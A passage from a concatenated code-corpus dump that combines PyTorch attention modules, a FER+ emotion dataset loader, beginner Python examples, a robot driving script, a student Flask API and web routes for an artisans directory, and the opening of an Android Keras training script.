super(PyramidPooling, self).__init__()
self.pool1 = nn.AdaptiveAvgPool2d(1)
self.pool2 = nn.AdaptiveAvgPool2d(2)
self.pool3 = nn.AdaptiveAvgPool2d(3)
self.pool4 = nn.AdaptiveAvgPool2d(6)
out_channels = int(in_channels/4)
self.conv1 = nn.Sequential(nn.Conv2d(in_channels, out_channels, 1, bias=False),
norm_layer(out_channels),
nn.ReLU(True))
self.conv2 = nn.Sequential(nn.Conv2d(in_channels, out_channels, 1, bias=False),
norm_layer(out_channels),
nn.ReLU(True))
self.conv3 = nn.Sequential(nn.Conv2d(in_channels, out_channels, 1, bias=False),
norm_layer(out_channels),
nn.ReLU(True))
self.conv4 = nn.Sequential(nn.Conv2d(in_channels, out_channels, 1, bias=False),
norm_layer(out_channels),
nn.ReLU(True))
# bilinear interpolate options
self._up_kwargs = up_kwargs
def forward(self, x):
_, _, h, w = x.size()
feat1 = F.interpolate(self.conv1(self.pool1(x)), (h, w), **self._up_kwargs)
feat2 = F.interpolate(self.conv2(self.pool2(x)), (h, w), **self._up_kwargs)
feat3 = F.interpolate(self.conv3(self.pool3(x)), (h, w), **self._up_kwargs)
feat4 = F.interpolate(self.conv4(self.pool4(x)), (h, w), **self._up_kwargs)
return torch.cat((x, feat1, feat2, feat3, feat4), 1)
class StripPooling(nn.Module):
"""
Reference:
"""
def __init__(self, in_channels, pool_size, up_kwargs, norm_layer=nn.BatchNorm2d):
super(StripPooling, self).__init__()
self.pool1 = nn.AdaptiveAvgPool2d(pool_size[0])
self.pool2 = nn.AdaptiveAvgPool2d(pool_size[1])
self.pool3 = nn.AdaptiveAvgPool2d((1, None))
self.pool4 = nn.AdaptiveAvgPool2d((None, 1))
inter_channels = int(in_channels/4)
self.conv1_1 = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 1, bias=False),
norm_layer(inter_channels),
nn.ReLU(True))
self.conv1_2 = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 1, bias=False),
norm_layer(inter_channels),
nn.ReLU(True))
self.conv2_0 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False),
norm_layer(inter_channels))
self.conv2_1 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False),
norm_layer(inter_channels))
self.conv2_2 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False),
norm_layer(inter_channels))
self.conv2_3 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, (1, 3), 1, (0, 1), bias=False),
norm_layer(inter_channels))
self.conv2_4 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, (3, 1), 1, (1, 0), bias=False),
norm_layer(inter_channels))
self.conv2_5 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False),
norm_layer(inter_channels),
nn.ReLU(True))
self.conv2_6 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False),
norm_layer(inter_channels),
nn.ReLU(True))
self.conv3 = nn.Sequential(nn.Conv2d(inter_channels*2, in_channels, 1, bias=False),
norm_layer(in_channels))
# bilinear interpolate options
self._up_kwargs = up_kwargs
def forward(self, x):
_, _, h, w = x.size()
x1 = self.conv1_1(x)
x2 = self.conv1_2(x)
x2_1 = self.conv2_0(x1)
x2_2 = F.interpolate(self.conv2_1(self.pool1(x1)), (h, w), **self._up_kwargs)
x2_3 = F.interpolate(self.conv2_2(self.pool2(x1)), (h, w), **self._up_kwargs)
x2_4 = F.interpolate(self.conv2_3(self.pool3(x2)), (h, w), **self._up_kwargs)
x2_5 = F.interpolate(self.conv2_4(self.pool4(x2)), (h, w), **self._up_kwargs)
x1 = self.conv2_5(F.relu_(x2_1 + x2_2 + x2_3))
x2 = self.conv2_6(F.relu_(x2_5 + x2_4))
out = self.conv3(torch.cat([x1, x2], dim=1))
return F.relu_(x + out)
class BilinearCNN(nn.Module):
def __init__(self, in_channels=512, inter_channels=512, num_classes=7, drop=0., eps=1e-10):
super(BilinearCNN, self).__init__()
self._in_channels = in_channels
self._inter_channels = inter_channels
self._eps = eps
if self._in_channels != self._inter_channels:
self.conv = nn.Sequential(nn.Conv2d(in_channels=self._in_channels, out_channels=self._inter_channels, kernel_size=1),
                                      nn.BatchNorm2d(self._inter_channels),
nn.ReLU(True))
self.fc = nn.Linear(in_features=inter_channels**2, out_features=num_classes)
self.drop = nn.Dropout(drop) if drop > 0 else nn.Identity()
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode="fan_out", nonlinearity="relu")
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def forward(self, x):
batch_size, in_channels, h, w = x.size()
feature_size = h * w
if self._in_channels != self._inter_channels:
x = self.conv(x)
x = x.view(batch_size, self._inter_channels, feature_size)
x = (torch.bmm(x, torch.transpose(x, 1, 2)) / feature_size).view(batch_size, -1)
x = torch.nn.functional.normalize(torch.sign(x) * torch.sqrt(torch.abs(x) + self._eps))
return self.fc(self.drop(x))
class SEWeightModule(nn.Module):
def __init__(self, channels, reduction=16):
super(SEWeightModule, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Conv2d(channels, channels//reduction, kernel_size=1, padding=0)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.Conv2d(channels//reduction, channels, kernel_size=1, padding=0)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
out = self.avg_pool(x)
out = self.fc1(out)
out = self.relu(out)
out = self.fc2(out)
weight = self.sigmoid(out)
return weight
def conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1, groups=1):
"""standard convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=groups, bias=False)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class PSAModule(nn.Module):
def __init__(self, inplans, planes, conv_kernels=[3, 5, 7, 9], stride=1, conv_groups=[1, 4, 8, 16]):
super(PSAModule, self).__init__()
self.conv_1 = conv(inplans, planes//4, kernel_size=conv_kernels[0], padding=conv_kernels[0]//2,
stride=stride, groups=conv_groups[0])
self.conv_2 = conv(inplans, planes//4, kernel_size=conv_kernels[1], padding=conv_kernels[1]//2,
stride=stride, groups=conv_groups[1])
self.conv_3 = conv(inplans, planes//4, kernel_size=conv_kernels[2], padding=conv_kernels[2]//2,
stride=stride, groups=conv_groups[2])
self.conv_4 = conv(inplans, planes//4, kernel_size=conv_kernels[3], padding=conv_kernels[3]//2,
stride=stride, groups=conv_groups[3])
self.se = SEWeightModule(planes // 4)
self.split_channel = planes // 4
self.softmax = nn.Softmax(dim=1)
def forward(self, x):
batch_size = x.shape[0]
x1 = self.conv_1(x)
x2 = self.conv_2(x)
x3 = self.conv_3(x)
x4 = self.conv_4(x)
feats = torch.cat((x1, x2, x3, x4), dim=1)
feats = feats.view(batch_size, 4, self.split_channel, feats.shape[2], feats.shape[3])
x1_se = self.se(x1)
x2_se = self.se(x2)
x3_se = self.se(x3)
x4_se = self.se(x4)
x_se = torch.cat((x1_se, x2_se, x3_se, x4_se), dim=1)
attention_vectors = x_se.view(batch_size, 4, self.split_channel, 1, 1)
attention_vectors = self.softmax(attention_vectors)
feats_weight = feats * attention_vectors
for i in range(4):
x_se_weight_fp = feats_weight[:, i, :, :]
if i == 0:
out = x_se_weight_fp
else:
out = torch.cat((x_se_weight_fp, out), 1)
return out
if __name__=='__main__':
model = NonLocalBlock(in_channels=16)
print(model)
input = torch.randn(1, 16, 64, 64)
out = model(input)
print(out.shape)
in_tensor = torch.ones((12, 64, 128, 128))
cb = ContextBlock(inplanes=64, ratio=1./16.,pooling_type='att')
out_tensor = cb(in_tensor)
print(in_tensor.shape)
print(out_tensor.shape)
in_channels = 64
pool_size = (3, 3)
norm_layer = nn.BatchNorm2d
up_kwargs = {
'scale_factor': None,
'mode': 'bilinear',
'align_corners': False
}
x = torch.rand(size=(4, in_channels, 16, 16))
sp = StripPooling(in_channels, pool_size, up_kwargs, norm_layer)
y = sp(x)
print(x.shape, y.shape)
in_channels = 512
inter_channels = 512
x = torch.randn(size=(4, in_channels, 16, 16))
model = BilinearCNN(in_channels=in_channels, inter_channels=inter_channels, drop=0.5)
y = model(x)
print(x.shape, y.shape)
x = torch.rand(size=(4, 64, 224, 224))
model = PSAModule(inplans=64, planes=64, stride=2)
y = model(x)
print(x.shape, y.shape)
```
#### File: FER/models/lightcnn_at.py
```python
import torch.nn as nn
from .lightcnn import LightCNN, LowHead
from .at import (
ContextBlock,
StripPooling,
)
def getATModule(at_type):
if at_type == 'CB':
return ContextBlock
if at_type == 'SP':
return StripPooling
raise NotImplementedError('{} not implemented'.format(at_type))
class LightCNNAT(LightCNN):
def __init__(self, low_head, at_type, at_kws, filters=[64, 128, 256, 512, 1024], num_classes=7, at_layer=[0, 0, 0, 0, 1]):
super(LightCNNAT, self).__init__(low_head, filters, num_classes)
at_model = getATModule(at_type)
self.at_layer = at_layer
if self.at_layer[0]:
self.at0 = at_model(**at_kws[0])
if self.at_layer[1]:
self.at1 = at_model(**at_kws[1])
if self.at_layer[2]:
self.at2 = at_model(**at_kws[2])
if self.at_layer[3]:
self.at3 = at_model(**at_kws[3])
if self.at_layer[4]:
self.at4 = at_model(**at_kws[4])
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode="fan_out", nonlinearity="relu")
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def forward(self, x):
x = self.low_head(x)
if self.at_layer[0]:
x = self.at0(x)
x = self.layer1(x)
if self.at_layer[1]:
x = self.at1(x)
x = self.layer2(x)
if self.at_layer[2]:
x = self.at2(x)
x = self.layer3(x)
if self.at_layer[3]:
x = self.at3(x)
x = self.layer4(x)
if self.at_layer[4]:
x = self.at4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
def make_lightcnn_at(in_channels, at_type, at_kws, num_classes=7, weight_path="",
filters=[64, 128, 256, 518, 1024], at_layer=[0, 0, 0, 0, 1], drop=0.):
filters = filters
low_head = LowHead(in_channels, filters[0])
at_layer = at_layer
model = LightCNNAT(low_head=low_head, at_type=at_type, at_kws=at_kws, filters=filters, num_classes=num_classes, at_layer=at_layer)
if drop > 0:
model.fc = nn.Sequential(
nn.Dropout(drop),
nn.Linear(filters[-1], num_classes)
)
return model
def lightcnn_at(in_channels, num_classes=7, weight_path="", **kw):
filters = kw['filters'] if 'filters' in kw else [64, 128, 256, 518, 1024]
at_layer = kw['at_layer'] if 'at_layer' in kw else [0, 0, 0, 0, 1]
drop = kw['drop'] if 'drop' in kw else 0.0
at_type = kw['at_type'] if 'at_type' in kw else 'CB'
at_kws = kw['at_kws'] if 'at_kws' in kw else [
{
'inplanes': filters[i]
} for i in range(len(filters))
]
return make_lightcnn_at(in_channels=in_channels, at_type=at_type, at_kws=at_kws,
num_classes=num_classes, weight_path=weight_path,
filters=filters, at_layer=at_layer, drop=drop)
```
#### File: utils/datasets/ferplus_dataset.py
```python
from torchvision.transforms import ToTensor, Normalize
from torch.utils.data import Dataset
from skimage import io
from PIL import Image
import numpy as np
import pandas
import torch
# Standard Libraries
from os import path, listdir
import sys
import csv
import re
# Modules
from utils import uimage
from utils.augmenters.augment import seg
class FERPlus(Dataset):
def __init__(self, idx_set=0, image_size=(96, 96), tta=False, tta_size=48,
max_loaded_images_per_label=10000, transforms=None, base_path_to_FER_plus=None):
"""
Code based on https://github.com/microsoft/FERPlus.
:param idx_set: Labeled = 0, Validation = 1, Test = 2
:param max_loaded_images_per_label: Maximum number of images per label
:param transforms: transforms (callable, optional): Optional transform to be applied on a sample.
"""
self.idx_set = idx_set
self.max_loaded_images_per_label = max_loaded_images_per_label
self.transforms = transforms
self.base_path_to_FER_plus = base_path_to_FER_plus
self.fer_sets = {0: 'FER2013Train/', 1: 'FER2013Valid/', 2: 'FER2013Test/'}
self.image_size = image_size
self._tta = tta
self._tta_size = tta_size
# Default values
self.num_labels = 8
self.mean = [0.0, 0.0, 0.0]
self.std = [1.0, 1.0, 1.0]
# Load data
self.loaded_data = self._load()
print('Size of the loaded set: {}'.format(self.loaded_data[0].shape[0]))
def is_tta(self):
return self._tta == True
def __len__(self):
return self.loaded_data[0].shape[0]
def __getitem__(self, idx):
sample = {'image': self.loaded_data[0][idx], 'emotion': self.loaded_data[1][idx]}
# train
if self.idx_set == 0:
sample['image'] = seg(image=sample['image'])
if not (self.transforms is None):
sample['image'] = self.transforms(sample['image'])
return Normalize(mean=self.mean, std=self.std)(ToTensor()(sample['image'])), sample['emotion']
def online_normalization(self, x):
return Normalize(mean=self.mean, std=self.std)(ToTensor()(x))
def norm_input_to_orig_input(self, x):
x_r = torch.zeros(x.size())
x_r[0] = (x[2] * self.std[2]) + self.mean[2]
x_r[1] = (x[1] * self.std[1]) + self.mean[1]
x_r[2] = (x[0] * self.std[0]) + self.mean[0]
return x_r
@staticmethod
def get_class(idx):
classes = {
0: 'Neutral',
1: 'Happy',
2: 'Sad',
3: 'Surprise',
4: 'Fear',
5: 'Disgust',
6: 'Anger',
7: 'Contempt'}
return classes[idx]
@staticmethod
def _parse_to_label(idx):
"""
Parse labels to make them compatible with AffectNet.
:param idx:
:return:
"""
emo_to_return = np.argmax(idx)
if emo_to_return == 2:
emo_to_return = 3
elif emo_to_return == 3:
emo_to_return = 2
elif emo_to_return == 4:
emo_to_return = 6
elif emo_to_return == 6:
emo_to_return = 4
return emo_to_return
@staticmethod
def _process_data(emotion_raw):
size = len(emotion_raw)
emotion_unknown = [0.0] * size
emotion_unknown[-2] = 1.0
# remove emotions with a single vote (outlier removal)
for i in range(size):
if emotion_raw[i] < 1.0 + sys.float_info.epsilon:
emotion_raw[i] = 0.0
sum_list = sum(emotion_raw)
emotion = [0.0] * size
# find the peak value of the emo_raw list
maxval = max(emotion_raw)
if maxval > 0.5 * sum_list:
emotion[np.argmax(emotion_raw)] = maxval
else:
emotion = emotion_unknown # force setting as unknown
return [float(i) / sum(emotion) for i in emotion]
def _load(self):
csv_label = []
data, labels = [], []
counter_loaded_images_per_label = [0 for _ in range(self.num_labels)]
path_folders_images = path.join(self.base_path_to_FER_plus, 'Images', self.fer_sets[self.idx_set])
path_folders_labels = path.join(self.base_path_to_FER_plus, 'Labels', self.fer_sets[self.idx_set])
with open(path_folders_labels + '/label.csv') as csvfile:
lines = csv.reader(csvfile)
for row in lines:
csv_label.append(row)
# Shuffle training set
if self.idx_set == 0:
np.random.shuffle(csv_label)
for l in csv_label:
emotion_raw = list(map(float, l[2:len(l)]))
emotion = self._process_data(emotion_raw)
emotion = emotion[:-2]
try:
emotion = [float(i) / sum(emotion) for i in emotion]
emotion = self._parse_to_label(emotion)
except ZeroDivisionError:
emotion = 9
if (emotion < self.num_labels) and (counter_loaded_images_per_label[int(emotion)] < self.max_loaded_images_per_label):
counter_loaded_images_per_label[int(emotion)] += 1
img = np.array(uimage.read(path.join(path_folders_images, l[0])), np.uint8)
box = list(map(int, l[1][1:-1].split(',')))
if box[-1] != 48:
print("[INFO] Face is not centralized.")
print(path.join(path_folders_images, l[0]))
print(box)
exit(-1)
img = img[box[0]:box[2], box[1]:box[3], :]
img = uimage.resize(img, self.image_size)
data.append(img)
labels.append(emotion)
has_loading_finished = (np.sum(counter_loaded_images_per_label) >= (self.max_loaded_images_per_label * self.num_labels))
if has_loading_finished:
break
return [np.array(data), np.array(labels)]
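# A small, hedged check of the majority-vote cleanup performed by _process_data above.
# The vote vectors are made-up annotator tallies (10 columns, like the FER+ label.csv
# rows), not real dataset entries.
if __name__ == '__main__':
    dominant = FERPlus._process_data([0.0, 7.0, 0.0, 2.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0])
    ambiguous = FERPlus._process_data([3.0, 3.0, 3.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
    print(dominant)   # a clear majority collapses onto one emotion (index 1 here)
    print(ambiguous)  # no majority, so the mass moves to the "unknown" slot (index -2)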
``` |
{
"source": "20-1-SKKU-OSS/c9-python-getting-started",
"score": 3
} |
#### File: more-python-for-beginners/01 - Formatting and linting/bad.py
```python
x = 12
if x == 24:
print('Is valid')
else:
print("Not valid")
def helper(name='sample'):
pass
def another(name = 'sample'):
pass
```
#### File: python-for-beginners/18 - Decorators/decorators_simple.py
```python
def decorator_function(original_function):
def wrapper_function():
print('{} function is about to be called'.format(original_function.__name__))
return original_function()
return wrapper_function
# Define normal function that print one line
def display_1():
print('display_1 function is running.')
# Define normal function that print one line
def display_2():
print('display_2 function is running.')
# Define with @decorator_function
@decorator_function
def display_3():
print('display_3 function is running.')
# Reassign display_1 function to use decorator function
display_1 = decorator_function(display_1)
# This will be called with decorator function, because of reassigning
display_1()
print()
# This will be called with decorator function
decorator_function(display_2)()
print()
# This will be called without decorator function
display_2()
print()
# This will be called with decorator function, because of @decorator_function
display_3()
``` |
{
"source": "2020-2021-s2-autonomous-robotics-b/psb-noah.github.io",
"score": 3
} |
#### File: 2020-2021-s2-autonomous-robotics-b/psb-noah.github.io/first.py
```python
from locorobo import LocoRobo
from locorobo import MotorDirection
from locorobo import Data
from locorobo import WaitType
from locorobo import Song
from locorobo import Note
def get_robot(robots, name):
robot = None
# Search through robots found during the scan for
# the one we want
for r in robots.values():
if r.name == name:
robot = r
# We found the robot, so stop the for loop
break
# If we did not find the robot during the scan, stop the program
if not robot:
raise Exception('Could not find robot with specified name')
return robot
def main():
# Tell LocoRobo what serial port to use
LocoRobo.setup("/dev/tty.usbmodem1")
# Scan for robots
robots = LocoRobo.scan(2000)
# Use get_robots to find robot with name lr d2:fa in the scan result
robot = get_robot(robots, "lr d2:fa")
robot.connect()
robot.activate_motors()
robot.enable_sensor(Data.ULTRASONIC, True)
#setup the distance to be travelled in centimeters
distance_cm = 100
# tried to use ultrasonic sensors to detect how far away a wall was, didn't go too well
# distance_cm = robot.get_sensor_value(Data.ULTRASONIC) - 10 #so that the robot doesn't HIT the wall
# print(distance_cm)
robot.setup_wait(WaitType.DISTANCE, distance_cm * 1000)
robot.move(MotorDirection.FORWARD, MotorDirection.FORWARD, 1, 1, True)
robot.deactivate_motors()
robot.disconnect()
# If we are on the main thread, run the program
if __name__ == "__main__":
try:
main()
except:
LocoRobo.stop()
raise
LocoRobo.stop()
# For compatibility with webapp's python, we can't use finally.
# If you are using local python, you can do the following
#
# try:
# main()
# finally:
# LocoRobo.stop()
``` |
{
"source": "2020-A-JS-GR1/py-velasquez-revelo-jefferson-david",
"score": 3
} |
#### File: ProyectoGrupal2B/api/artesanosController.py
```python
from flask import Flask, request
from flask_restplus import Namespace, Resource, Api, fields
import pymongo
from bson import ObjectId
from database import get_db
api = Namespace('artesanos', description='artesanos related operations')
artesanosParser = api.parser()
artesanosParser.add_argument(
'page', type=int, help='page number', location='head')
artesanosParser.add_argument('pageSize', type=int,
help='page size', location='head')
queryArtesanos = {"tipoUser": 1,
"tipoId": 1,
"identificacion": 1,
"email": 1,
"apellidos": 1,
"nombres": 1,
"direccion": 1,
"ubicacion": 1,
"telefonos": 1,
"estado": 1,
"intentos": 1,
"servicios": 1
}
servicesParser = api.parser()
servicesParser.add_argument(
'page', type=int, help='page number', location='head')
servicesParser.add_argument('pageSize', type=int,
help='page size', location='head')
servicesParser.add_argument('service', type=str,
help='serviceName', location='head')
allParser = api.parser()
allParser.add_argument(
'page', type=int, help='page number', location='head')
allParser.add_argument('pageSize', type=int,
help='page size', location='head')
allParser.add_argument('service', type=str,
help='serviceName', location='head')
allParser.add_argument('canton', type=str,
help='canton', location='head')
allParser.add_argument('parroquia', type=str,
help='parroquia', location='head')
queryServices = {"tipoUser": 1,
"tipoId": 1,
"identificacion": 1,
"email": 1,
"apellidos": 1,
"nombres": 1,
"direccion": 1,
"ubicacion": 1,
"telefonos": 1,
"estado": 1,
"intentos": 1,
"servicios": 1
}
@api.route('/')
class Artesanos(Resource):
@api.doc(parser=artesanosParser)
def get(self):
db = get_db()
args = request.args
page = int(args['page'])
pageSize = int(args['pageSize'])
people = list(db["users"].find({"tipoUser": "artesano"}, queryArtesanos).skip(
page * pageSize).limit(pageSize))
for person in people:
person['_id'] = str(person['_id'])
return {"total": db["users"].count_documents({"tipoUser": "artesano"}), "items": people}, 200
@api.route('/artesanos-by-service')
class ArtesanosService(Resource):
@api.doc(parser=servicesParser)
def get(self):
db = get_db()
args = request.args
page = int(args['page'])
pageSize = int(args['pageSize'])
if args['service']:
people = list(db["users"].find({"tipoUser": "artesano", "servicios": args['service']}, queryServices).skip(
page * pageSize).limit(pageSize))
else:
people = list(db["users"].find({"tipoUser": "artesano"}, queryServices).skip(
page * pageSize).limit(pageSize))
for person in people:
person['_id'] = str(person['_id'])
return {"total": db["users"].count_documents({"tipoUser": "artesano", "servicios": args['service']}), "items": people}, 200
@api.route('/artesanos-by-all')
class ArtesanosService2(Resource):
@api.doc(parser=allParser)
def get(self):
db = get_db()
args = request.args
page = int(args['page'])
pageSize = int(args['pageSize'])
if args['service'] and args['canton'] and args['parroquia']:
people = list(db["users"].find({"tipoUser": "artesano", "servicios": args['service'], "ubicacion.parroquia": args['parroquia']}, queryServices).skip(
page * pageSize).limit(pageSize))
else:
people = list(db["users"].find({"tipoUser": "artesano"}, queryServices).skip(
page * pageSize).limit(pageSize))
for person in people:
person['_id'] = str(person['_id'])
return {"total": len(people), "items": people}, 200
```
#### File: ProyectoGrupal2B/api/sessionsController.py
```python
from flask import Flask, request
from flask_restplus import Namespace, Resource, Api, fields
import pymongo
from bson import ObjectId
from database import get_db
import hashlib
api = Namespace('sessions', description='Session related operations')
sessionPayload = api.model('sessionPayload', {
"email": fields.String,
"password": fields.String
})
passwordPayload = api.model('passwordPayload', {
"oldPassword": fields.String,
"newPassword": fields.String
})
lockUsersPayload = api.model('lockUsersPayload',{
"action": fields.String
})
@api.route('/')
class Sessions(Resource):
@api.expect(sessionPayload)
def post(self):
collection = get_db()["users"]
body = api.payload
if body:
body['password'] = str(hashlib.sha256(
body['password'].encode()).hexdigest())
user = collection.find_one({"email": body["email"]})
if user is None:
return {"invaliCredentials": True}, 401
if user['password'] == body['password'] and user['intentos'] < 3 and user['estado']:
collection.update_one({"email": body["email"]}, {
"$set": {"intentos": 0}})
return {"_id" : str(user['_id'])}, 200
elif user['intentos'] >= 3 and user['estado']:
collection.update_one({"email": body["email"]}, {
"$set": {"estado": False}})
return {"userBlocked": True}, 403
elif not user['estado']:
return {"userBlocked": True}, 403
elif not user['estado']:
return {"userBlocked": True}, 403
collection.update_one({"email": body["email"]}, {
"$inc": {"intentos": 1}})
return {"invaliCredentials": True}, 401
@api.route('/<string:id>')
class Session(Resource):
@api.expect(passwordPayload)
def put(self, id):
collection = get_db()["users"]
body = api.payload
body['oldPassword'] = str(hashlib.sha256(
body['oldPassword'].encode()).hexdigest())
body['newPassword'] = str(hashlib.sha256(
body['newPassword'].encode()).hexdigest())
user = collection.find_one({"_id": ObjectId(id)})
if user is None:
return {"id": id}, 404
elif user['password'] == body['oldPassword']:
collection.update_one({"_id": ObjectId(id)}, {"$set": {"password": body['newPassword']}})
return {"passwordUpdated": True}, 200
return {"passwordUpdated": False}, 403
@api.route('/unlock-users/<string:id>')
class Lock(Resource):
@api.expect(lockUsersPayload)
def post(self, id):
collection = get_db()["users"]
user = collection.find_one({"_id": ObjectId(id)})
if user is None:
return {"id": id}, 404
body = api.payload
status = True
if body['action'] == "lock":
status = False
elif body['action'] == "unlock":
status = True
collection.update_one({"_id": ObjectId(id)}, {"$set": {"estado": status, "intentos": 0}})
return {"UserIsLocked": not status}, 200
```
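Both the login check and the password change above compare SHA-256 hex digests rather than plain text. A minimal standalone sketch of that comparison (the sample password is made up):
```python
import hashlib

def hash_password(password: str) -> str:
    # same transformation the controller applies before storing or comparing
    return hashlib.sha256(password.encode()).hexdigest()

stored = hash_password('correct-horse')           # value the users collection would hold
print(hash_password('correct-horse') == stored)   # True  -> login succeeds, intentos reset to 0
print(hash_password('wrong-guess') == stored)     # False -> intentos is incremented
```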
#### File: ProyectoGrupal2B/api/usersController.py
```python
from flask import Flask, request
from flask_restplus import Namespace, Resource, Api, fields
import pymongo
from bson import ObjectId
from database import get_db
import hashlib
api = Namespace('users', description='User related operations')
locationPayload = api.model('locationPayload', {
"provincia": fields.String,
"canton": fields.String,
"parroquia": fields.String
})
userPayload = api.model('userPayload', {
"tipoUser" : fields.String(["admin","cliente","artesano"]),
"tipoId" : fields.String,
"identificacion": fields.String,
"email" : fields.String,
"apellidos": fields.String,
"nombres": fields.String,
"direccion": fields.String,
"ubicacion": fields.Nested(locationPayload),
"telefonos" : fields.List(fields.String),
"password" : fields.String, #el password se almacena hasheado como MD5
"estado": fields.Boolean, #activo 1, inactivo 0
"intentos": fields.Integer, #numero de intentos para el login, max 3
"servicios" : fields.List(fields.String) #solo si es artesano
})
userUpdatePayload = api.model('userUpdatePayload', {
"tipoUser": fields.String(["admin", "cliente", "artesano"]),
"tipoId": fields.String,
"identificacion": fields.String,
"email": fields.String,
"apellidos": fields.String,
"nombres": fields.String,
"direccion": fields.String,
"ubicacion": fields.Nested(locationPayload),
"telefonos": fields.List(fields.String),
"estado" : fields.Boolean,
"intentos": fields.Integer,
"servicios": fields.List(fields.String)
})
queryUsers = {"tipoUser": 1,
"tipoId": 1,
"identificacion": 1,
"email": 1,
"apellidos": 1,
"nombres": 1,
"direccion": 1,
"ubicacion": 1,
"telefonos": 1,
"estado": 1,
"intentos": 1,
"servicios": 1
}
userParser = api.parser()
userParser.add_argument(
'page', type=int, help='page number', location='head')
userParser.add_argument('pageSize', type=int,
help='page size', location='head')
@api.route('/')
class People(Resource):
@api.doc(parser=userParser)
def get(self):
db = get_db()
args = request.args
page = int(args['page'])
pageSize = int(args['pageSize'])
people = list(db["users"].find({}, queryUsers).skip(
page * pageSize).limit(pageSize))
for person in people:
person['_id'] = str(person['_id'])
return {"total": db['users'].count_documents({}), "items": people}, 200
@api.expect(userPayload)
def post(self):
db = get_db()
body = api.payload
body['password'] = str(hashlib.sha256(body['password'].encode()).hexdigest())
if db["users"].find_one({"tipoId": body["tipoId"], "identificacion": body["identificacion"]}) or db["users"].find_one({"email": body["email"]}):
return {"personExists": True}, 400
res = db["users"].insert_one(body)
return {"_id": str(res.inserted_id)}, 200
@api.route('/<string:id>')
class Person(Resource):
def get(self, id):
db = get_db()
res = db["users"].find_one({"_id": ObjectId(id)}, queryUsers)
if res is None:
return {"id": id}, 404
res['_id'] = str(res['_id'])
return res, 200
def delete(self, id):
db = get_db()
res = db['users'].delete_one({"_id": ObjectId(id)})
if res.deleted_count <= 0:
return {"_id": id}, 404
return {}, 200
@api.expect(userPayload)
def put(self, id):
db = get_db()
body = api.payload
person = db['users'].find_one({"_id": ObjectId(id)})
if person == None:
return {"id": id}, 404
db['users'].update_one({"_id": ObjectId(id)}, {"$set" : body})
person = db['users'].find_one({"_id": ObjectId(id)})
person['_id'] = str(person['_id'])
return person, 200
```
#### File: ProyectoGrupal2B/app/routes.py
```python
import flask
from flask import render_template
import requests
import flask_login
from app import app
from .user import User
@app.route('/')
@app.route('/index')
def index():
return render_template('index.html', title='Home')
@app.route('/BusquedaArtesanos')
def BusquedaArtesanos():
return render_template('BusquedaArtesanos.html', title='Buscar Artesanos')
@app.route('/RegistrarArtesano')
def RegistrarArtesano():
return render_template('RegistrarArtesano.html', title='Registrar Artesanos')
@app.route('/InscripcionCurso')
def InscripcionCurso():
return render_template('InscripcionCurso.html', title='Inscripcion a Curso')
@app.route('/RegistrarAcuerdo')
def RegistrarAcuerdo():
return render_template('RegistrarAcuerdo.html', title='Registrar Acuerdo')
@app.route('/CrearCurso')
def CrearCurso():
return render_template('CrearCurso.html', title='Crear Curso')
@app.route('/InfoCurso')
def InfoCurso():
return render_template('InfoCurso.html', title='Informacion de Curso')
@app.route('/Login', methods=['GET', 'POST'])
def Login():
if flask.request.method == 'GET':
return render_template('login.html', title='Login')
email = flask.request.form.get('email')
password = flask.request.form['password']
res = requests.post('http://127.0.0.1:5000/sessions/', json={"email": email,
"password": password})
if res.status_code == 200:
usrid = res.json()['_id']
user = User()
user.id = usrid
flask_login.login_user(user)
return flask.redirect(flask.url_for('protected'))
return 'Bad login'
@app.route('/NuevoInstructor')
def NuevoInstructor():
return render_template('NuevoInstructor.html', title='Nuevo Instructor de Curso')
@app.route('/Registrate')
def Registrate():
return render_template('registrate.html', title='Registrarse al Sistema')
#@app.route('/RegistrarArtesano/<string:id>')
#def getID(id):
# idpagina = {'pagina': id}
# return render_template('RegistrarArtesano.html', title='Registrar Artesanos', idpagina=idpagina)
``` |
{
"source": "2020akumar/MLTest",
"score": 3
} |
#### File: main/python/main.py
```python
from android.os import Environment
from tensorflow.python import keras
import tensorflow as tf
from tensorflow.python.keras.datasets import mnist
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers import Dense,Dropout,Activation,Flatten
from tensorflow.python.keras.layers import Conv2D, MaxPooling2D
from tensorflow.python.keras.callbacks import Callback
import time
import os
import gc
import random
import cv2
import numpy as np
# numt=0
class TimeStop(Callback):
def __init__(self,seconds=0):
super(Callback,self).__init__()
self.start_time=0
self.seconds=seconds
def on_train_begin(self, logs=None):
self.start_time=time.time()
def on_batch_end(self, batch, logs=None):
print(time.time()-self.start_time)
if time.time()-self.start_time>self.seconds:
self.model.stop_training=True
print("Stopped after %s seconds"%(self.seconds))
def main(second=150,conv=2,dens=2 ):
print(tf.__version__)
